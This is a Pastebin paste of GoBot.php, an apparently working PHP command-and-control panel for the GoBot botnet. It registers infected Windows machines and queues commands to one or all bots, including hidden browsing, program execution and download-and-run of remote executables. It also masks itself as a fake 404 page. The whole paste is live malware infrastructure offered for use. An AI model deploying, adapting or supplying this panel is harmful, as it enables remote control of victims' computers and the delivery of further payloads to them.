FlyFar

GoBot.php

Jul 15th, 2023
182
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.05 KB | Cybersecurity | 0 0
  1. <?php
  2. $PanelPassword = "key"; //Letters and Numbers Only
  3.  
  4. $SQLName     = "localhost";
  5. $SQLUser     = "root";
  6. $SQLPassword = "";
  7. $SQLDatabase = "gobots";
  8.  
  9.  
  10. $conn = new mysqli($SQLName, $SQLUser, $SQLPassword, $SQLDatabase);
  11. if ($conn->connect_error) {
  12.     die("Connection failed: " . $conn->connect_error);
  13. }
  14.  
  15. ?>
  16.  
  17. <?php
  18. if (isset($_REQUEST["get"])):
  19.     $tmpdat = mysql_real_escape_string($_REQUEST["get"]);
  20.     $sql    = "SELECT Command FROM bots WHERE HWID='$tmpdat'";
  21.     $result = $conn->query($sql);
  22.     if ($result->num_rows > 0) {
  23.         while ($row = $result->fetch_assoc()) {
  24.             echo $row["Command"];
  25.         }
  26.     } else {
  27.         echo "Bot does not exist.";
  28.     }
  29. ?>
  30. <?php
  31. elseif (isset($_REQUEST["cmd"]) && $_REQUEST["cmd"] == $PanelPassword):
  32.     $per_page = 10;
  33.     if ($result = $conn->query("SELECT * FROM bots ORDER BY id")) {
  34.         if ($result->num_rows != 0) {
  35.             $total_results = $result->num_rows;
  36.             $total_pages   = ceil($total_results / $per_page);
  37.             if (isset($_GET['page']) && is_numeric($_GET['page'])) {
  38.                 $show_page = $_GET['page'];
  39.                 if ($show_page > 0 && $show_page <= $total_pages) {
  40.                     $start = ($show_page - 1) * $per_page;
  41.                     $end   = $start + $per_page;
  42.                 } else {
  43.                     $start = 0;
  44.                     $end   = $per_page;
  45.                 }
  46.             } else {
  47.                 $start = 0;
  48.                 $end   = $per_page;
  49.             }
  50.             echo "<center><h1>GoBot Control Panel</h1><br/>";
  51.             echo "<table border='1' cellpadding='10'>";
  52.             echo "<tr><th>HWID</th> <th>Username</th> <th>Windows</th> <th>IP</th> <th>Options</th></tr>";
  53.             for ($i = $start; $i < $end; $i++) {
  54.                 if ($i == $total_results) {
  55.                     break;
  56.                 }
  57.                 $result->data_seek($i);
  58.                 $row = $result->fetch_row();
  59.                 echo "<tr>";
  60.                 echo '<td>' . $row[1] . '</td>';
  61.                 echo '<td>' . $row[2] . '</td>';
  62.                 echo '<td>' . $row[3] . '</td>';
  63.                 echo '<td>' . $row[4] . '</td>';
  64.                 echo "<td><a href='$_SERVER[REQUEST_URI]&command=$row[1]'>Command</a> | <a href='$_SERVER[REQUEST_URI]&delete=$row[1]'>Delete</a></td>";
  65.                 echo "</tr>";
  66.             }
  67.             echo "</table>";
  68.             echo "<center><p><b>View Page:</b> ";
  69.             for ($i = 1; $i <= $total_pages; $i++) {
  70.                 if (isset($_GET['page']) && $_GET['page'] == $i) {
  71.                     echo $i . " ";
  72.                 } else {
  73.                     echo "<a href='$_SERVER[REQUEST_URI]&page=$i'>$i</a> ";
  74.                 }
  75.             }
  76.             echo "</p>";
  77.             echo "<form method=\"post\" action=\"http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]\">\n";
  78.             echo "<input type=\"text\" name=\"command\"><br>\n";
  79.             echo "   <input type=\"hidden\" name=\"hwid\" value=\"ALL\" /><br>\n";
  80.             echo "<input type=\"submit\" name=\"submitall\" value=\"Send Command to All\"><br>\n";
  81.             echo "</form></center>\n";
  82.         } else {
  83.             echo "<center>No results to display!</center>";
  84.         }
  85.     } else {
  86.         echo "Error: " . $mysqli->error;
  87.     }
  88.     if (isset($_POST['submit'])) //Single Bot
  89.         {
  90.         $raw_tmp = mysql_real_escape_string($_REQUEST["command"]);
  91.         $raw_tmp2 = mysql_real_escape_string($_REQUEST["hwid"]);
  92.         $enc_tmp = base64_encode($raw_tmp2."|".$raw_tmp);
  93.        
  94.         if ($stmt = $conn->prepare("UPDATE bots SET command='$enc_tmp' WHERE HWID = ? LIMIT 1")) {
  95.             $stmt->bind_param("s", $raw_tmp2);
  96.             $stmt->execute();
  97.             $stmt->close();
  98.             echo "<strong>Command: </strong><i>" . $raw_tmp . " </i><strong>Sent!</strong><br/>";
  99.             $url = strtok($_SERVER["REQUEST_URI"], '?');
  100.             $key = $_REQUEST["cmd"];
  101.             echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  102.         } else {
  103.             echo "ERROR: could not prepare SQL statement.";
  104.         }
  105.     } elseif (isset($_POST['submitall'])) //All Bots
  106.         {
  107.         $raw_tmp = mysql_real_escape_string($_REQUEST["command"]);
  108.         $raw_tmp2 = mysql_real_escape_string($_REQUEST["hwid"]);
  109.         $enc_tmp = base64_encode($raw_tmp2."|".$raw_tmp);    
  110.         if ($stmt = $conn->prepare("UPDATE bots SET command='$enc_tmp'")) {;
  111.             $stmt->execute();
  112.             $stmt->close();
  113.             echo "<strong>Command: </strong><i>" . $raw_tmp . " </i><strong>Sent!</strong><br/>";
  114.             $url = strtok($_SERVER["REQUEST_URI"], '?');
  115.             $key = $_REQUEST["cmd"];
  116.             echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  117.         } else {
  118.             echo "ERROR: could not prepare SQL statement.";
  119.         }
  120.     } elseif (isset($_REQUEST["command"])) {
  121.         $tmpid = $_REQUEST["command"];
  122.         echo "<strong>Target:</strong> <i>$tmpid</i>";
  123.         echo "<form method=\"post\" action=\"http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]\">\n";
  124.         echo "   <input type=\"text\" name=\"command\"><br>\n";
  125.         echo "   <input type=\"hidden\" name=\"hwid\" value=\"$tmpid\" /><br>\n";
  126.         echo "   <input type=\"submit\" name=\"submit\" value=\"Send Command to $tmpid\"><br>\n";
  127.         echo "</form>\n";
  128.        
  129.     } elseif (isset($_REQUEST["delete"])) {
  130.         $id = $_REQUEST["delete"];
  131.         if ($stmt = $conn->prepare("DELETE FROM bots WHERE HWID = ? LIMIT 1")) {
  132.             $stmt->bind_param("s", $id);
  133.             $stmt->execute();
  134.             $stmt->close();
  135.         } else {
  136.             echo "ERROR: could not prepare SQL statement.";
  137.         }
  138.         echo "<strong>Bot deleted!</strong><br/>";
  139.         $url = strtok($_SERVER["REQUEST_URI"], '?');
  140.         $key = $_REQUEST["cmd"];
  141.         echo "<strong>Refresh Page: </strong> <a href='$url?cmd=$key'>HERE</a>";
  142.     }
  143. ?>
  144. <center><table width="50%" border="1">
  145.   <caption>
  146.     <h2>GoBot Commands</h2>
  147.   </caption>
  148.   <tbody>
  149.     <tr>
  150.       <th scope="col">Name</th>
  151.       <th scope="col">Command</th>
  152.       <th scope="col">Example</th>
  153.     </tr>
  154.     <tr>
  155.       <td><center>Open Website Visable</center></td>
  156.       <td><center>1|{URL}|V</center></td>
  157.       <td><center>1|www.google.com|V</center></td>
  158.     </tr>
  159.     <tr>
  160.       <td><center>
  161.       Open Website Hidden
  162.       </center></td>
  163.       <td><center>
  164.       1|{URL}|H
  165.       </center></td>
  166.       <td><center>
  167.         1|www.google.com|H
  168.       </center></td>
  169.     </tr>
  170.     <tr>
  171.       <td><center>
  172.       Show Message Box
  173.       </center></td>
  174.       <td><center>
  175.       2|{TITLE}|{MESSAGE}
  176.       </center></td>
  177.       <td><center>
  178.       2|GoBot|Hello World!
  179.       </center></td>
  180.     </tr>
  181.     <tr>
  182.       <td><center>
  183.       Kill GoBot
  184.       </center></td>
  185.       <td><center>
  186.       0
  187.       </center></td>
  188.       <td><center>
  189.       0
  190.       </center></td>
  191.     </tr>
  192.        <tr>
  193.       <td><center>Start Program</center></td>
  194.       <td><center>3|{PROGRAMNAME}.exe</center></td>
  195.       <td><center>3|calc.exe</center></td>
  196.     </tr>
  197.         <tr>
  198.       <td><center>Download and Run</center></td>
  199.       <td><center>4|{URLTOEXE}</center></td>
  200.       <td><center>4|http://filehost.com/file.exe</center></td>
  201.     </tr>
  202.       <tr>
  203.       <td>&nbsp;</td>
  204.       <td>&nbsp;</td>
  205.       <td>&nbsp;</td>
  206.     </tr>
  207.   </tbody>
  208. </table>
  209.   <h2>How to use</h2>
  210. <br/>
  211. Once a bot is running it will connect to the Control panel, it will send its information and then wait for orders.
  212. <br/>
  213. To command a single bot, find it on the list and select "Command". This will bring up a new command box with the bots HWID aready in, just enter your command like you see it on the command list.
  214. <br/>
  215. To command all bots just enter the command in the "Send Command to All" field.
  216. <br/>
  217. <br/>
  218. <strong>Project Github:</strong> <a href="https://github.com/SaturnsVoid/GoBot/" target="new">Github.com</a>
  219. </center>
  220. <?php
  221. elseif (isset($_REQUEST["INFO"]) || isset($_REQUEST["HWID"]) || isset($_REQUEST["USERNAME"]) || isset($_REQUEST["WINDOWS"])):
  222.     $tmpdatA = mysql_real_escape_string($_REQUEST["HWID"]);
  223.     $tmpdatB = mysql_real_escape_string($_REQUEST["USERNAME"]);
  224.     $tmpdatC = mysql_real_escape_string($_REQUEST["WINDOWS"]);
  225.     $tmpdatD = mysql_real_escape_string($_SERVER['REMOTE_ADDR']);
  226.     $query   = mysqli_query($conn, "SELECT Command FROM bots WHERE HWID='$tmpdatA'");
  227.     if (mysqli_num_rows($query) > 0) {
  228.        
  229.         echo "Already Exists";
  230.     } else {
  231.         $sql = "INSERT INTO bots (HWID, Username, Windows, IP) VALUES ('$tmpdatA', '$tmpdatB', '$tmpdatC', '$tmpdatD')";
  232.         if ($conn->query($sql) === TRUE) {
  233.             echo "New record created successfully";
  234.         } else {
  235.             echo "Error: " . $sql . "<br>" . $conn->error;
  236.         }
  237.     }
  238. ?>
  239.  
  240. <?php
  241. else:
  242. ?>
  243.    <!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
  244.     <HTML><HEAD>
  245.     <TITLE>404 Not Found</TITLE>
  246.     </HEAD><BODY>
  247.     <H1>Not Found</H1>
  248.     The requested URL was not found on this server.
  249.     </BODY></HTML>
  250. <?php
  251. endif;
  252. ?>
Tags: php botnet
Add Comment
Please, Sign In to add comment